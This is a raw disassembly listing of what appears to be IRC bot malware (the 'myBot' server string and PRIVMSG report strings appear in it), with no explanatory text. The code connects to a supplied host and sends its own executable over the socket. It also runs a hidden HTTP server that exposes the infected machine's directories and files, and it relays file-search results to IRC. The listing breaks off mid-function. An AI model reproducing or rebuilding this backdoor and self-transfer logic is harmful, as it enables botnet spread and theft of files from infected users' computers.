var_1A0 = byte ptr -1A0h var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 1A0h lea eax, [ebp+var_1A0] push eax push 101h call dword_4271F0 ; WSAStartup push 0 push 1 push 2 call dword_427220 ; socket push [ebp+arg_0] mov ds:dword_4CE3A8, eax mov [ebp+var_10], 2 call dword_42720C ; inet_addr push [ebp+arg_4] mov [ebp+var_C], eax call dword_427210 ; htons mov [ebp+var_E], ax lea eax, [ebp+var_10] push 10h push eax push ds:dword_4CE3A8 call dword_427214 ; connect cmp eax, 0FFFFFFFFh jnz short loc_40F037 push ds:dword_4CE3A8 call dword_42721C ; closesocket call dword_4271EC ; WSACleanup xor eax, eax leave retn ; --------------------------------------------------------------------------- loc_40F037: ; CODE XREF: sub_40EFBF+60j push 1 pop eax leave retn sub_40EFBF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40F03C proc near ; CODE XREF: sub_40E992:loc_40EEEDp var_504 = byte ptr -504h var_104 = byte ptr -104h push ebp mov ebp, esp sub esp, 504h push esi lea eax, [ebp+var_104] push 104h push eax push 0 call dword_427070 ; GetModuleFileNameA lea eax, [ebp+var_104] push offset dword_429068 push eax call sub_41B4C2 mov esi, eax pop ecx test esi, esi pop ecx jz short loc_40F0D3 test byte ptr [esi+0Ch], 10h jnz short loc_40F0B7 push edi mov edi, 400h loc_40F07F: ; CODE XREF: sub_40F03C+78j push esi push 1 lea eax, [ebp+var_504] push edi push eax call sub_41B11A add esp, 10h lea eax, [ebp+var_504] push 0 push edi push eax push ds:dword_4CE3A8 call dword_427224 ; send push 1 call dword_427078 ; Sleep test byte ptr [esi+0Ch], 10h jz short loc_40F07F pop edi loc_40F0B7: ; CODE XREF: sub_40F03C+3Bj push esi call sub_41B05B pop ecx push ds:dword_4CE3A8 call dword_42721C ; closesocket call dword_4271EC ; WSACleanup push 1 pop eax loc_40F0D3: ; CODE XREF: sub_40F03C+35j pop esi leave retn sub_40F03C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40F0D6 proc near ; DATA XREF: sub_401ACD+2284o ; sub_40BACE+475o var_28F0 = byte ptr -28F0h var_18F0 = byte ptr -18F0h var_8F0 = byte ptr -8F0h var_6F0 = byte ptr -6F0h var_5EC = dword ptr -5ECh var_5E8 = byte ptr -5E8h var_360 = byte ptr -360h var_25C = dword ptr -25Ch var_254 = dword ptr -254h var_250 = dword ptr -250h var_24C = dword ptr -24Ch var_248 = dword ptr -248h var_23C = byte ptr -23Ch var_138 = dword ptr -138h var_134 = dword ptr -134h var_34 = byte ptr -34h var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 28F0h call sub_41BB20 mov eax, [ebp+arg_0] push ebx push esi push edi mov ecx, 0ECh mov esi, eax lea edi, [ebp+var_5EC] push 1 rep movsd pop esi xor ebx, ebx mov [eax+3ACh], esi push 10h lea eax, [ebp+var_24] push ebx push eax mov [ebp+var_14], esi call sub_41B590 add esp, 0Ch mov [ebp+var_24], 2 push [ebp+var_25C] call ds:dword_4CB654 ; htons push ebx push esi push 2 mov [ebp+var_22], ax mov [ebp+var_20], ebx call ds:dword_4CB6D4 ; socket mov edi, eax cmp edi, 0FFFFFFFFh mov [ebp+var_C], edi jz loc_40F4C1 mov eax, [ebp+var_254] push 10h imul eax, 234h mov dword_43E59C[eax], edi lea eax, [ebp+var_24] push eax push edi call ds:dword_4CB680 ; bind cmp eax, 0FFFFFFFFh jz loc_40F4C1 push 7FFFFFFFh push edi call ds:dword_4CB67C ; listen cmp eax, 0FFFFFFFFh jz loc_40F4C1 lea eax, [ebp+var_14] push eax push 8004667Eh push edi call ds:dword_4CB6F0 ; ioctlsocket cmp eax, 0FFFFFFFFh jz loc_40F4C1 mov ebx, esi mov [ebp+var_134], edi mov [ebp+var_138], ebx mov [ebp+var_8], edi loc_40F1AD: ; CODE XREF: sub_40F0D6+3E1j push 41h xor eax, eax pop ecx lea esi, [ebp+var_138] push eax push eax push eax lea eax, [ebp+var_6F0] push eax mov eax, [ebp+var_8] lea edi, [ebp+var_6F0] inc eax rep movsd push eax call ds:dword_4CB63C ; select cmp eax, 0FFFFFFFFh jz loc_40F4BC xor esi, esi mov [ebp+var_4], esi loc_40F1E3: ; CODE XREF: sub_40F0D6+3DBj lea eax, [ebp+var_6F0] push eax push esi call ds:dword_4CB540 ; __WSAFDIsSet test eax, eax jz loc_40F4A7 cmp esi, [ebp+var_C] jnz short loc_40F265 lea eax, [ebp+var_10] mov [ebp+var_10], 10h push eax lea eax, [ebp+var_34] push eax push [ebp+var_C] call ds:dword_4CB6E8 ; accept cmp eax, 0FFFFFFFFh jz loc_40F4A7 xor ecx, ecx test ebx, ebx jbe short loc_40F237 lea edx, [ebp+var_134] loc_40F22B: ; CODE XREF: sub_40F0D6+15Fj cmp [edx], eax jz short loc_40F237 inc ecx add edx, 4 cmp ecx, ebx jb short loc_40F22B loc_40F237: ; CODE XREF: sub_40F0D6+14Dj ; sub_40F0D6+157j cmp ecx, ebx jnz short loc_40F254 cmp ebx, 40h jnb short loc_40F254 mov [ebp+ecx*4+var_134], eax mov ebx, [ebp+var_138] inc ebx mov [ebp+var_138], ebx loc_40F254: ; CODE XREF: sub_40F0D6+163j ; sub_40F0D6+168j cmp eax, [ebp+var_8] jbe loc_40F4A7 mov [ebp+var_8], eax jmp loc_40F4A7 ; --------------------------------------------------------------------------- loc_40F265: ; CODE XREF: sub_40F0D6+126j mov edi, 1000h lea eax, [ebp+var_28F0] push edi push 0 push eax call sub_41B590 push edi lea eax, [ebp+var_18F0] push 0 push eax call sub_41B590 add esp, 18h lea eax, [ebp+var_28F0] push 0 push edi push eax push esi call ds:dword_4CB66C ; recv test eax, eax jg short loc_40F2F8 push esi call ds:dword_4CB6EC ; closesocket xor ecx, ecx test ebx, ebx jbe loc_40F4A7 lea eax, [ebp+var_134] loc_40F2B7: ; CODE XREF: sub_40F0D6+1EBj cmp [eax], esi jz short loc_40F2C8 inc ecx add eax, 4 cmp ecx, ebx jb short loc_40F2B7 jmp loc_40F4A7 ; --------------------------------------------------------------------------- loc_40F2C8: ; CODE XREF: sub_40F0D6+1E3j lea eax, [ebx-1] cmp ecx, eax jnb short loc_40F2EC lea eax, [ebp+ecx*4+var_134] loc_40F2D6: ; CODE XREF: sub_40F0D6+214j mov edx, [eax+4] inc ecx mov [eax], edx mov ebx, [ebp+var_138] add eax, 4 lea edx, [ebx-1] cmp ecx, edx jb short loc_40F2D6 loc_40F2EC: ; CODE XREF: sub_40F0D6+1F7j dec ebx mov [ebp+var_138], ebx jmp loc_40F4A7 ; --------------------------------------------------------------------------- loc_40F2F8: ; CODE XREF: sub_40F0D6+1C8j xor esi, esi push 104h lea eax, [ebp+var_23C] push esi push eax call sub_41B590 lea eax, [ebp+var_28F0] mov [ebp+arg_0], esi push eax call sub_41AFE0 add esp, 10h test eax, eax jbe loc_40F4A7 loc_40F326: ; CODE XREF: sub_40F0D6+309j mov eax, [ebp+arg_0] mov al, [ebp+eax+var_28F0] cmp al, 0Ah mov [ebp+esi+var_18F0], al jnz loc_40F3CB mov esi, offset aGet_0 ; "GET " lea eax, [ebp+var_18F0] push esi push eax call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_40F39F lea eax, [ebp+var_18F0] push eax call sub_41AFE0 cmp eax, 5 pop ecx jbe short loc_40F39F mov eax, offset asc_42D128 ; " " push eax push eax lea eax, [ebp+var_18F0] push esi push eax call sub_41B900 pop ecx pop ecx push eax call sub_41B900 pop ecx pop ecx push eax call sub_41C0F4 push eax lea eax, [ebp+var_23C] push eax call sub_41BEB0 add esp, 10h jmp short loc_40F3B6 ; --------------------------------------------------------------------------- loc_40F39F: ; CODE XREF: sub_40F0D6+27Fj ; sub_40F0D6+291j lea eax, [ebp+var_18F0] push offset asc_433F14 ; "\r\n" push eax call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_40F3EA loc_40F3B6: ; CODE XREF: sub_40F0D6+2C7j push edi lea eax, [ebp+var_18F0] push 0 push eax call sub_41B590 add esp, 0Ch or esi, 0FFFFFFFFh loc_40F3CB: ; CODE XREF: sub_40F0D6+263j inc [ebp+arg_0] lea eax, [ebp+var_28F0] push eax inc esi call sub_41AFE0 cmp [ebp+arg_0], eax pop ecx jb loc_40F326 jmp loc_40F4A7 ; --------------------------------------------------------------------------- loc_40F3EA: ; CODE XREF: sub_40F0D6+2DEj xor ecx, ecx test ebx, ebx jbe short loc_40F434 lea eax, [ebp+var_134] loc_40F3F6: ; CODE XREF: sub_40F0D6+32Dj mov esi, [ebp+var_4] cmp [eax], esi jz short loc_40F407 inc ecx add eax, 4 cmp ecx, ebx jb short loc_40F3F6 jmp short loc_40F437 ; --------------------------------------------------------------------------- loc_40F407: ; CODE XREF: sub_40F0D6+325j lea eax, [ebx-1] cmp ecx, eax jnb short loc_40F42B lea eax, [ebp+ecx*4+var_134] loc_40F415: ; CODE XREF: sub_40F0D6+353j mov edx, [eax+4] inc ecx mov [eax], edx mov ebx, [ebp+var_138] add eax, 4 lea edx, [ebx-1] cmp ecx, edx jb short loc_40F415 loc_40F42B: ; CODE XREF: sub_40F0D6+336j dec ebx mov [ebp+var_138], ebx jmp short loc_40F437 ; --------------------------------------------------------------------------- loc_40F434: ; CODE XREF: sub_40F0D6+318j mov esi, [ebp+var_4] loc_40F437: ; CODE XREF: sub_40F0D6+32Fj ; sub_40F0D6+35Cj lea eax, [ebp+var_23C] test eax, eax jz short loc_40F4A0 lea eax, [ebp+var_360] push eax call sub_41AFE0 mov edi, eax lea eax, [ebp+var_23C] push eax call sub_41AFE0 add edi, eax pop ecx cmp edi, 104h pop ecx jnb short loc_40F4A0 and [ebp+arg_0], 0 lea eax, [ebp+arg_0] push eax push 8004667Eh push esi call ds:dword_4CB6F0 ; ioctlsocket push [ebp+var_254] lea eax, [ebp+var_23C] push [ebp+var_248] push eax lea eax, [ebp+var_360] push eax push esi call sub_40F6B4 add esp, 14h jmp short loc_40F4A7 ; --------------------------------------------------------------------------- loc_40F4A0: ; CODE XREF: sub_40F0D6+369j ; sub_40F0D6+38Fj push esi call ds:dword_4CB6EC ; closesocket loc_40F4A7: ; CODE XREF: sub_40F0D6+11Dj ; sub_40F0D6+143j ... mov esi, [ebp+var_4] inc esi cmp esi, [ebp+var_8] mov [ebp+var_4], esi jbe loc_40F1E3 jmp loc_40F1AD ; --------------------------------------------------------------------------- loc_40F4BC: ; CODE XREF: sub_40F0D6+102j mov edi, [ebp+var_C] xor ebx, ebx loc_40F4C1: ; CODE XREF: sub_40F0D6+6Aj ; sub_40F0D6+92j ... call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_8F0] push offset unk_433EEC push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_24C], ebx jnz short loc_40F507 push ebx lea eax, [ebp+var_8F0] push [ebp+var_250] push eax lea eax, [ebp+var_5E8] push eax push [ebp+var_5EC] call sub_409A73 add esp, 14h loc_40F507: ; CODE XREF: sub_40F0D6+40Cj lea eax, [ebp+var_8F0] push eax call sub_4151AD pop ecx push edi call ds:dword_4CB6EC ; closesocket push [ebp+var_254] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread pop edi pop esi pop ebx sub_40F0D6 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40F531 proc near ; DATA XREF: sub_40F6B4+24Do var_1654 = byte ptr -1654h var_654 = byte ptr -654h var_550 = byte ptr -550h var_44C = dword ptr -44Ch var_3C8 = byte ptr -3C8h var_2C4 = byte ptr -2C4h var_B8 = dword ptr -0B8h var_B4 = dword ptr -0B4h var_A4 = dword ptr -0A4h var_9C = byte ptr -9Ch var_68 = byte ptr -68h var_20 = byte ptr -20h arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 1654h call sub_41BB20 mov eax, [ebp+arg_0] push esi push edi mov ecx, 0ECh mov esi, eax lea edi, [ebp+var_44C] rep movsd mov dword ptr [eax+3ACh], 1 lea eax, [ebp+var_3C8] push eax lea eax, [ebp+var_550] push eax call sub_41B886 pop ecx lea eax, [ebp+var_2C4] pop ecx push eax lea eax, [ebp+var_654] push eax call sub_41B886 xor edi, edi pop ecx cmp [ebp+var_A4], edi pop ecx jz short loc_40F597 push offset aTextHtml ; "text/html" jmp short loc_40F59C ; --------------------------------------------------------------------------- loc_40F597: ; CODE XREF: sub_40F531+5Dj push offset aApplicationOct ; "application/octet-stream" loc_40F59C: ; CODE XREF: sub_40F531+64j lea eax, [ebp+var_9C] push eax call sub_41B886 pop ecx lea eax, [ebp+var_68] pop ecx mov esi, 409h push 46h push eax push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy" push edi push edi push esi call dword_427104 ; GetDateFormatA lea eax, [ebp+var_20] push 1Eh push eax push offset aHhMmSs ; "HH:mm:ss" push edi push edi push esi call dword_427100 ; GetTimeFormatA lea eax, [ebp+var_20] cmp [ebp+var_B8], 0FFFFFFFFh push eax lea eax, [ebp+var_68] push eax lea eax, [ebp+var_20] push eax lea eax, [ebp+var_68] push eax lea eax, [ebp+var_20] push eax lea eax, [ebp+var_68] push eax jnz short loc_40F615 lea eax, [ebp+var_9C] push eax lea eax, [ebp+var_1654] push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"... push eax call sub_41B886 add esp, 24h jmp short loc_40F636 ; --------------------------------------------------------------------------- loc_40F615: ; CODE XREF: sub_40F531+C5j push [ebp+var_B8] lea eax, [ebp+var_9C] push eax lea eax, [ebp+var_1654] push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"... push eax call sub_41B886 add esp, 28h loc_40F636: ; CODE XREF: sub_40F531+E2j lea eax, [ebp+var_1654] push edi push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_1654] push eax push [ebp+var_44C] call ds:dword_4CB6A4 ; send cmp [ebp+var_A4], edi jnz short loc_40F676 lea eax, [ebp+var_550] push eax push [ebp+var_44C] call sub_40FFF1 pop ecx pop ecx jmp short loc_40F693 ; --------------------------------------------------------------------------- loc_40F676: ; CODE XREF: sub_40F531+12Dj lea eax, [ebp+var_654] push eax push edi push [ebp+var_44C] lea eax, [ebp+var_550] push eax call sub_40F96B add esp, 10h loc_40F693: ; CODE XREF: sub_40F531+143j push [ebp+var_44C] call ds:dword_4CB6EC ; closesocket push [ebp+var_B4] call sub_40B413 pop ecx push edi call dword_4270CC ; ExitThread pop edi pop esi sub_40F531 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40F6B4 proc near ; CODE XREF: sub_40F0D6+3C0p var_8C4 = byte ptr -8C4h var_6C4 = dword ptr -6C4h var_640 = byte ptr -640h var_53C = byte ptr -53Ch var_330 = dword ptr -330h var_32C = dword ptr -32Ch var_31C = dword ptr -31Ch var_318 = dword ptr -318h var_314 = byte ptr -314h var_211 = byte ptr -211h var_210 = byte ptr -210h var_10C = byte ptr -10Ch var_10B = byte ptr -10Bh var_10A = byte ptr -10Ah var_8 = byte ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 8C4h push ebx push esi push edi xor edi, edi push 104h lea eax, [ebp+var_210] push edi push eax mov [ebp+var_4], edi call sub_41B590 mov eax, [ebp+arg_8] add esp, 0Ch cmp byte ptr [eax], 2Fh jz short loc_40F6EA push eax push offset aS_3 ; "\\%s" jmp short loc_40F6F3 ; --------------------------------------------------------------------------- loc_40F6EA: ; CODE XREF: sub_40F6B4+2Cj push eax mov byte ptr [eax], 5Ch push offset aS_2 ; "%s" loc_40F6F3: ; CODE XREF: sub_40F6B4+34j lea eax, [ebp+var_10C] push eax call sub_41B886 add esp, 0Ch lea eax, [ebp+var_10C] xor esi, esi xor ebx, ebx push eax call sub_41AFE0 test eax, eax pop ecx jbe short loc_40F78E mov [ebp+arg_8], 2 loc_40F71E: ; CODE XREF: sub_40F6B4+D8j lea eax, [ebp+var_10C] push eax call sub_41AFE0 cmp [ebp+arg_8], eax pop ecx jnb short loc_40F75E cmp [ebp+esi+var_10C], 25h jnz short loc_40F75E cmp [ebp+esi+var_10B], 32h jnz short loc_40F75E cmp [ebp+esi+var_10A], 30h jnz short loc_40F75E inc esi mov [ebp+ebx+var_210], 20h inc esi add [ebp+arg_8], 2 jmp short loc_40F778 ; --------------------------------------------------------------------------- loc_40F75E: ; CODE XREF: sub_40F6B4+7Aj ; sub_40F6B4+84j ... mov al, [ebp+esi+var_10C] cmp al, 2Fh jnz short loc_40F76E push 5Ch pop eax jmp short loc_40F771 ; --------------------------------------------------------------------------- loc_40F76E: ; CODE XREF: sub_40F6B4+B3j movsx eax, al loc_40F771: ; CODE XREF: sub_40F6B4+B8j mov [ebp+ebx+var_210], al loc_40F778: ; CODE XREF: sub_40F6B4+A8j lea eax, [ebp+var_10C] inc esi inc [ebp+arg_8] push eax inc ebx call sub_41AFE0 cmp esi, eax pop ecx jb short loc_40F71E loc_40F78E: ; CODE XREF: sub_40F6B4+61j lea eax, [ebp+var_210] push eax lea eax, [ebp+var_314] push [ebp+arg_4] push offset dword_429AD0 push eax call sub_41B886 lea eax, [ebp+var_314] push offset asc_42A0A4 ; "\n" push eax call sub_41C0F4 add esp, 18h lea eax, [ebp+var_314] push eax call dword_427098 ; GetFileAttributesA push 1 cmp eax, 10h pop esi jz short loc_40F7DF cmp eax, 0FFFFFFFFh jnz short loc_40F7E2 push [ebp+arg_0] jmp loc_40F862 ; --------------------------------------------------------------------------- loc_40F7DF: ; CODE XREF: sub_40F6B4+11Cj mov [ebp+var_4], esi loc_40F7E2: ; CODE XREF: sub_40F6B4+121j cmp [ebp+ebx+var_211], 5Ch jnz short loc_40F7EF mov [ebp+var_4], esi loc_40F7EF: ; CODE XREF: sub_40F6B4+136j mov ebx, [ebp+arg_0] cmp [ebp+var_4], edi mov [ebp+var_6C4], ebx mov [ebp+var_318], edi jz short loc_40F86D cmp [ebp+arg_C], edi jz short loc_40F861 lea eax, [ebp+var_314] push offset asc_4341A0 ; "*" push eax call sub_41BEC0 pop ecx lea eax, [ebp+var_314] pop ecx push eax lea eax, [ebp+var_640] push eax call sub_41B886 lea eax, [ebp+var_210] push eax call sub_4100AE add esp, 0Ch lea eax, [ebp+var_210] push eax lea eax, [ebp+var_53C] push eax call sub_41B886 or [ebp+var_330], 0FFFFFFFFh pop ecx pop ecx mov [ebp+var_31C], esi jmp short loc_40F8BC ; --------------------------------------------------------------------------- loc_40F861: ; CODE XREF: sub_40F6B4+152j push ebx loc_40F862: ; CODE XREF: sub_40F6B4+126j call ds:dword_4CB6EC ; closesocket jmp loc_40F964 ; --------------------------------------------------------------------------- loc_40F86D: ; CODE XREF: sub_40F6B4+14Dj push edi push edi push 3 push edi push esi lea eax, [ebp+var_314] push 80000000h push eax call dword_4270EC ; CreateFileA mov esi, eax cmp esi, 0FFFFFFFFh jz short loc_40F8BC lea eax, [ebp+var_314] push eax lea eax, [ebp+var_640] push eax call sub_41B886 pop ecx mov [ebp+var_31C], edi pop ecx push edi push esi call dword_427108 ; GetFileSize push esi mov [ebp+var_330], eax call dword_427068 ; CloseHandle loc_40F8BC: ; CODE XREF: sub_40F6B4+1ABj ; sub_40F6B4+1D6j mov esi, [ebp+arg_10] lea eax, [ebp+var_8C4] push esi push offset unk_43416C push eax call sub_41B886 push edi lea eax, [ebp+var_8C4] push 3 push eax call sub_40B0F7 mov [ebp+var_32C], eax imul eax, 234h add esp, 18h mov dword_43E594[eax], esi lea eax, [ebp+var_8] push eax lea eax, [ebp+var_6C4] push edi push eax push offset sub_40F531 push edi push edi call dword_42707C ; CreateThread mov ecx, [ebp+var_32C] imul ecx, 234h cmp eax, edi mov dword_43E5A4[ecx], eax jz short loc_40F936 loc_40F924: ; CODE XREF: sub_40F6B4+280j cmp [ebp+var_318], edi jnz short loc_40F964 push 5 call dword_427078 ; Sleep jmp short loc_40F924 ; --------------------------------------------------------------------------- loc_40F936: ; CODE XREF: sub_40F6B4+26Ej push ebx call ds:dword_4CB6EC ; closesocket call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_8C4] push offset unk_434134 push eax call sub_41B886 lea eax, [ebp+var_8C4] push eax call sub_4151AD add esp, 10h loc_40F964: ; CODE XREF: sub_40F6B4+1B4j ; sub_40F6B4+276j pop edi pop esi xor eax, eax pop ebx leave retn sub_40F6B4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40F96B proc near ; CODE XREF: sub_401ACD+777Bp ; sub_40F531+15Ap var_594 = byte ptr -594h var_490 = byte ptr -490h var_388 = dword ptr -388h var_374 = byte ptr -374h var_368 = dword ptr -368h var_35C = byte ptr -35Ch var_248 = byte ptr -248h var_48 = byte ptr -48h var_20 = byte ptr -20h var_18 = word ptr -18h var_16 = word ptr -16h var_12 = word ptr -12h var_10 = word ptr -10h var_E = word ptr -0Eh var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 594h push ebx push esi push edi xor ebx, ebx push 104h lea eax, [ebp+var_594] push ebx push eax mov [ebp+var_4], ebx mov [ebp+var_8], ebx call sub_41B590 mov edi, [ebp+arg_0] push offset asc_42A0A4 ; "\n" push edi call sub_41C0F4 add esp, 14h cmp [ebp+arg_8], ebx jz short loc_40F9CA push edi mov esi, 200h push [ebp+arg_8] lea eax, [ebp+var_248] push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n" push esi push eax call sub_41B980 add esp, 14h jmp loc_40FAC9 ; --------------------------------------------------------------------------- loc_40F9CA: ; CODE XREF: sub_40F96B+3Aj cmp [ebp+arg_C], ebx push edi jz loc_40FAAF call sub_41AFE0 pop ecx mov [eax+edi-1], bl push edi mov esi, 200h push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"... lea eax, [ebp+var_248] push esi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send push edi push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""... lea eax, [ebp+var_248] push esi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send push edi call sub_41AFE0 pop ecx mov byte ptr [eax+edi], 2Ah push 3Ch push 96h push 0E6h push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"... lea eax, [ebp+var_248] push esi push eax call sub_41B980 add esp, 18h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"... lea eax, [ebp+var_248] push esi push eax call sub_41B980 add esp, 0Ch jmp short loc_40FAC9 ; --------------------------------------------------------------------------- loc_40FAAF: ; CODE XREF: sub_40F96B+63j mov esi, 200h push offset aSearchingForS ; "Searching for: %s\r\n" lea eax, [ebp+var_248] push esi push eax call sub_41B980 add esp, 10h loc_40FAC9: ; CODE XREF: sub_40F96B+5Aj ; sub_40F96B+142j lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send cmp [ebp+arg_C], ebx jz short loc_40FB64 push [ebp+arg_C] call sub_41AFE0 cmp eax, 2 pop ecx jbe short loc_40FB64 push [ebp+arg_C] call sub_41AFE0 sub eax, 3 pop ecx jz short loc_40FB15 loc_40FB09: ; CODE XREF: sub_40F96B+1A8j mov ecx, [ebp+arg_C] cmp byte ptr [eax+ecx], 2Fh jz short loc_40FB15 dec eax jnz short loc_40FB09 loc_40FB15: ; CODE XREF: sub_40F96B+19Cj ; sub_40F96B+1A5j inc eax push eax lea eax, [ebp+var_594] push [ebp+arg_C] push eax call sub_41B5F0 add esp, 0Ch lea eax, [ebp+var_594] push eax push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"... lea eax, [ebp+var_248] push esi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send loc_40FB64: ; CODE XREF: sub_40F96B+180j ; sub_40F96B+18Ej lea eax, [ebp+var_388] push eax push edi call dword_427000 ; FindFirstFileA lea ecx, [ebp+var_388] mov [ebp+arg_0], eax push ecx push eax call dword_427118 ; FindNextFileA test eax, eax jz loc_40FF54 mov edi, 1FFh loc_40FB90: ; CODE XREF: sub_40F96B+5E3j cmp [ebp+var_388], ebx jz loc_40FF3C lea eax, [ebp+var_35C] push offset a__ ; ".." push eax call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40FF3C lea eax, [ebp+var_35C] push offset a_ ; "." push eax call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40FF3C lea eax, [ebp+var_20] push eax lea eax, [ebp+var_374] push eax call dword_427114 ; FileTimeToLocalFileTime lea eax, [ebp+var_18] push eax lea eax, [ebp+var_20] push eax call dword_427110 ; FileTimeToSystemTime mov ax, [ebp+var_10] mov ecx, offset aPm ; "PM" cmp ax, 0Ch ja short loc_40FC05 mov ecx, offset aAm ; "AM" loc_40FC05: ; CODE XREF: sub_40F96B+293j cmp ax, 0Ch movzx eax, ax jbe short loc_40FC11 sub eax, 0Ch loc_40FC11: ; CODE XREF: sub_40F96B+2A1j push ecx movzx ecx, [ebp+var_E] push ecx push eax movzx eax, [ebp+var_18] push eax movzx eax, [ebp+var_12] push eax movzx eax, [ebp+var_16] push eax lea eax, [ebp+var_48] push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s" push eax call sub_41B886 add esp, 20h test byte ptr [ebp+var_388], 10h jz loc_40FDB4 inc [ebp+var_8] cmp [ebp+arg_8], ebx jz short loc_40FC85 lea eax, [ebp+var_35C] push eax push offset aS_0 ; "<%s>" lea eax, [ebp+var_490] push 106h push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_48] push eax lea eax, [ebp+var_490] push eax push [ebp+arg_8] push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n" jmp loc_40FEFD ; --------------------------------------------------------------------------- loc_40FC85: ; CODE XREF: sub_40F96B+2E0j cmp [ebp+arg_C], ebx jz loc_40FD6F push 0E6h push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\"" lea eax, [ebp+var_248] push edi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send lea eax, [ebp+var_35C] push eax lea eax, [ebp+var_248] push [ebp+arg_C] push offset aSS_1 ; "%s%s/" push edi push eax call sub_41B980 add esp, 14h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send lea eax, [ebp+var_35C] push eax call sub_41AFE0 cmp eax, 1Eh pop ecx lea eax, [ebp+var_35C] push eax jbe short loc_40FD25 push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>" jmp short loc_40FD2A ; --------------------------------------------------------------------------- loc_40FD25: ; CODE XREF: sub_40F96B+3B1j push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>" loc_40FD2A: ; CODE XREF: sub_40F96B+3B8j lea eax, [ebp+var_248] push edi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_248] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_248] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send lea eax, [ebp+var_48] push 3Ch push eax push 96h push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"... push edi jmp loc_40FEFE ; --------------------------------------------------------------------------- loc_40FD6F: ; CODE XREF: sub_40F96B+31Dj lea eax, [ebp+var_35C] push eax push offset aS_0 ; "<%s>" lea eax, [ebp+var_490] push 106h push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_48] push eax lea eax, [ebp+var_490] push eax push offset a31s21s ; "%-31s %-21s\r\n" lea eax, [ebp+var_248] push esi push eax call sub_41B980 add esp, 14h jmp loc_40FF0D ; --------------------------------------------------------------------------- loc_40FDB4: ; CODE XREF: sub_40F96B+2D4j inc [ebp+var_4] cmp [ebp+arg_8], ebx jz short loc_40FDF3 push ebx push [ebp+var_368] call sub_416923 pop ecx pop ecx push eax lea eax, [ebp+var_48] push eax lea eax, [ebp+var_35C] push eax push [ebp+arg_8] push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n" push esi 